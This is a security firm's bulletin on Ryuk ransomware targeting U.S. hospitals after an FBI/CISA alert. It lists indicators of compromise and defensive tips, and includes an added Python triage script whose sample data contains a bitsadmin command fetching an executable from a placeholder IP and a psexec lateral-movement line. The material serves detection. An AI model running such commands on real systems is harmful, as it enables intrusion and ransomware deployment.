RE: The joint statement made by the FBI and Cybersecurity & Infrastructure Security Agency (CISA) “Ransomware Activity Targeting the Healthcare and Public Health Sector”
FRSecure has been working with the FBI and CISA, directly and indirectly, since Saturday, October 24, to assist in the investigation of a credible threat to U.S. hospitals and healthcare providers. During recent incident response engagements, we’ve seen indicators of compromise (IoCs) that confirm Ryuk ransomware attacks are occurring. However, there are still concerns about the nature of such attacks.
Despite our involvement, we chose to be very careful in how we released information to the public. Feeding into any unnecessary fear, uncertainty, or doubt related to events is counter to our mission. Because the FBI and CISA have made their public announcement, we feel comfortable sharing what we know with you.
If you notice unusual activity in your technology environment or have information about an incident, please email us at for immediate assistance.
Learn More in Our Webinar
We hosted a live webinar on Friday, October 30th, at 12 p.m. CST to answer your questions about this developing threat. View the recording here.
About the Attack
The threat of a Ryuk ransomware incident is real. Many details about the joint FBI and CISA announcement are still not known, including attacker coordination, how widespread it may/may not be, timing, and context. We cannot say with certainty that this is a widespread coordinated attack.
This is developing news, and we want to make sure everyone is aware. It’s our collective responsibility to be proactive in finding indicators of compromise (IoC), sharing them with our community, taking preventative measures, and ensuring our response capabilities are effective.
Based upon the IoCs obtained during our investigations, here’s what we’ve seen.
Often, the attack starts with email phishing and/or emails containing an attachment with a malicious payload. In some cases, the attackers used malicious links or existing open connections to the internal network (RDP/TCP 3389, for instance); however, phishing has been the most common initial attack vector.
See “Key Findings and Resources” below for more detailed information, but here are some immediate tips for you to limit your chances of suffering from a ransomware attack.
Tips
- Important: Ensure your data is backed up consistently and that your backups are stored off-network.
- Any network connectivity could potentially be leveraged by an attacker to destroy your backups.
- Test your restoration capabilities by testing your backups—even to the point of full/bare-metal restores.
- Report any unusual activity to your IT/security team’s attention.
- If you are able, look for common IoCs. If you suspect any are present, immediately bring them to your IT/security team’s attention.
- If you’re not experiencing anything unusual or seeing any IoCs, great! You are in a position to continue your preparation. Consider completing your own ransomware readiness assessment.
Key Findings and Resources
If you are seeing any of the indicators or activities depicted below in your environment, you could be ransomed or soon-to-be ransomed—even if systems appear to be functioning normally.
The tactics, techniques, and procedures (TTPs) outlined in this communication are or could be associated with the advanced persistent threat (APT) group known as UNC1878. UNC1878 is believed to be the primary organization involved in the joint FBI/CISA announcement.
These indicators can change quickly, and this should not be considered a full, complete, or static dataset.
- Typical Payload Delivery Method:
- Phishing email > TrickBot (malware) > Cobalt Strike (tool) > Ryuk (ransomware)
NOTE: Cobalt Strike is always used to deliver this attack. Empire (C2) and Metasploit are sometimes used in addition.
- Secondary payload deployment methods include batch scripts using PSEXEC, BITSadmin, and Windows Management Instrumentation (WMI).
NOTE: If you see any unexpected behavior from these legitimate processes, investigate further.
- Typical Domains for Command and Control (C2):
- OpenProvider hosted domains
- Uses “Let’s Encrypt” SSL certificates on port 80 (http), which is typically unencrypted
- Virtual private servers hosted predominantly by Choopa
- Cobalt Strike is always used on non-standard ports (not 50050)
- NOTE: Cobalt Strike beacon configured with Amazon malleable C2 profile
- Reconnaissance Tools Used:
- Credential Harvesting Tools Used:
- Typical File Names and Locations:
- Files are usually dropped at c:\user\XXX\AppData\Roaming\xxx.exe
- Names include:
- P32.exe
- P64.exe
- vVv.exe
- wmi.bat
- xxx.exe
- zZz.exe
- 1234.zip
- socks.exe
- defender.exe
- _paxe.exe
- Other Details:
- Utilizes Signed Code
- DIT (AD Database) and Registry theft
- Typically, no other data theft
- No history of extortion
- Time to ransom (TTR)
- Average: 5 days, 17 hours
- Fastest: 2 days, 6 hours
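The delivery chain, the C2 traits, and the file-name/location indicators above are the pieces a defender actually hunts for. The following Python triage script is an added example written for this bulletin; it is not FRSecure's tooling or the IoC dump referenced below. It checks three things from constructed sample data: file names from the list above sitting under AppData\Roaming, PSEXEC/BITSadmin/WMIC launched from a batch file or referencing AppData\Roaming (the secondary deployment pattern), and outbound connections showing the C2 traits (a Let's Encrypt certificate on port 80, a Choopa-hosted server). The process-line format and the `tls_issuer`/`asn_org` enrichment fields are assumptions for the example; on a real host the path list would come from a directory walk and the connection records from proxy or NetFlow data with certificate and ASN enrichment.

```python
"""Host and network triage checks built from the indicators in this bulletin:
IoC file names under AppData\\Roaming, secondary deployment through PsExec,
BITSAdmin and WMIC, and the C2 traits (Let's Encrypt certificates on port 80,
Choopa-hosted servers). Added example, not FRSecure's tooling; the record
formats and sample data below are constructed for the example."""
import re
from pathlib import PureWindowsPath

# File names from the bulletin, matched case-insensitively.
IOC_FILENAMES = frozenset(n.lower() for n in [
    "P32.exe", "P64.exe", "vVv.exe", "wmi.bat", "xxx.exe", "zZz.exe",
    "1234.zip", "socks.exe", "defender.exe", "_paxe.exe",
])

# Drop location from the bulletin (c:\user\XXX\AppData\Roaming\...), subfolders included.
ROAMING_RE = re.compile(r"^[a-z]:\\users?\\[^\\]+\\appdata\\roaming(\\|$)", re.I)

# Binaries behind the secondary deployment methods named in the bulletin.
DEPLOY_TOOLS = {"psexec.exe", "psexec64.exe", "bitsadmin.exe", "wmic.exe"}

# Constructed process-creation line format (Sysmon-like fields, simplified).
PROC_RE = re.compile(
    r"^(?P<ts>\S+) ParentImage=(?P<parent>\S+) Image=(?P<image>\S+) "
    r"CommandLine=(?P<cmd>.*)$")


def flag_dropped_files(paths):
    """Return (path, reason) for IoC file names; a name inside AppData\\Roaming
    gets the stronger reason because that is the drop location in the bulletin."""
    hits = []
    for p in paths:
        wp = PureWindowsPath(p)
        if wp.name.lower() not in IOC_FILENAMES:
            continue
        in_roaming = ROAMING_RE.match(str(wp.parent)) is not None
        hits.append((p, "ioc-name-in-roaming" if in_roaming else "ioc-name"))
    return hits


def flag_deployment_commands(lines):
    """Flag PsExec/BITSAdmin/WMIC launched by cmd.exe (batch script) or with a
    command line that references AppData\\Roaming. Returns (ts, image, cmd)."""
    hits = []
    for line in lines:
        m = PROC_RE.match(line)
        if not m:
            continue
        image = PureWindowsPath(m["image"]).name.lower()
        if image not in DEPLOY_TOOLS:
            continue
        parent = PureWindowsPath(m["parent"]).name.lower()
        if parent == "cmd.exe" or "appdata\\roaming" in m["cmd"].lower():
            hits.append((m["ts"], image, m["cmd"]))
    return hits


def flag_c2_connections(conns):
    """conns: dicts with dst_ip, dst_port, tls_issuer, asn_org (assumed
    enrichment fields). Returns {dst_ip: [reasons]} for the bulletin's C2 traits."""
    findings = {}
    for c in conns:
        reasons = []
        issuer = (c.get("tls_issuer") or "").lower()
        if c.get("dst_port") == 80 and "let's encrypt" in issuer:
            reasons.append("lets-encrypt-tls-on-port-80")
        if "choopa" in (c.get("asn_org") or "").lower():
            reasons.append("choopa-hosted-server")
        if reasons:
            findings[c["dst_ip"]] = reasons
    return findings


# --- constructed sample data (not real telemetry) ---
SAMPLE_PATHS = [
    r"C:\Users\jdoe\AppData\Roaming\zZz.exe",
    r"C:\Users\jdoe\AppData\Roaming\Microsoft\Word\normal.dotm",
    r"C:\Temp\socks.exe",
    r"C:\Program Files\Vendor\P64.exe",
]
SAMPLE_PROC_LINES = [
    r"2020-10-27T03:14:00Z ParentImage=C:\Windows\System32\cmd.exe Image=C:\Windows\System32\bitsadmin.exe CommandLine=bitsadmin /transfer job /download /priority high http://203.0.113.10/p32.exe C:\Users\jdoe\AppData\Roaming\P32.exe",
    r"2020-10-27T03:15:00Z ParentImage=C:\Windows\explorer.exe Image=C:\Tools\PsExec.exe CommandLine=psexec \\fileserver -s cmd /c C:\Users\jdoe\AppData\Roaming\wmi.bat",
    r"2020-10-27T08:00:00Z ParentImage=C:\Windows\System32\svchost.exe Image=C:\Windows\System32\wmic.exe CommandLine=wmic os get caption",
]
SAMPLE_CONNS = [
    {"dst_ip": "198.51.100.7", "dst_port": 80, "tls_issuer": "Let's Encrypt Authority X3", "asn_org": "Choopa, LLC"},
    {"dst_ip": "198.51.100.9", "dst_port": 443, "tls_issuer": "DigiCert Inc", "asn_org": "Example Hosting"},
]


def triage():
    """Run every check over the constructed samples; one result per check."""
    return {
        "files": flag_dropped_files(SAMPLE_PATHS),
        "processes": flag_deployment_commands(SAMPLE_PROC_LINES),
        "c2": flag_c2_connections(SAMPLE_CONNS),
    }


if __name__ == "__main__":
    for check, result in triage().items():
        print(check, result)
```

The file check deliberately keeps a weaker "ioc-name" result for matches outside AppData\Roaming so that a name collision in a vendor directory is reviewed rather than silently dropped, and the ordinary `wmic os get caption` from svchost.exe in the sample is left alone, which is the point of the bulletin's note that these legitimate processes only warrant investigation when their behaviour is unexpected.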
External Resources
Here are additional and credible resources you can use to assist you in preparation, detection, and response:
- CISA
- Mandiant Explainer Video
- IoC Dump (includes all IPs, known domains, and files/hashes)
- Continuous IoC for Emotet
NOTE: Our IoCs above do not include Emotet because Emotet was not used by the attackers in our cases. Emotet has often been seen in other Ryuk attacks.
Final Thoughts
We cannot stress enough how important it is for you to be prepared. If you see any of the IoCs listed in this bulletin in your environment, please bring them to the attention of your internal security team immediately and reach out to us. FRSecure is always here to help!
Please share this message with everyone, but especially with organizations you know in the healthcare and healthcare supply chain industry sectors. There is certainly the potential that the Ryuk threat will continue to grow.
It’s up to us to get out ahead of it.
Thank you in advance.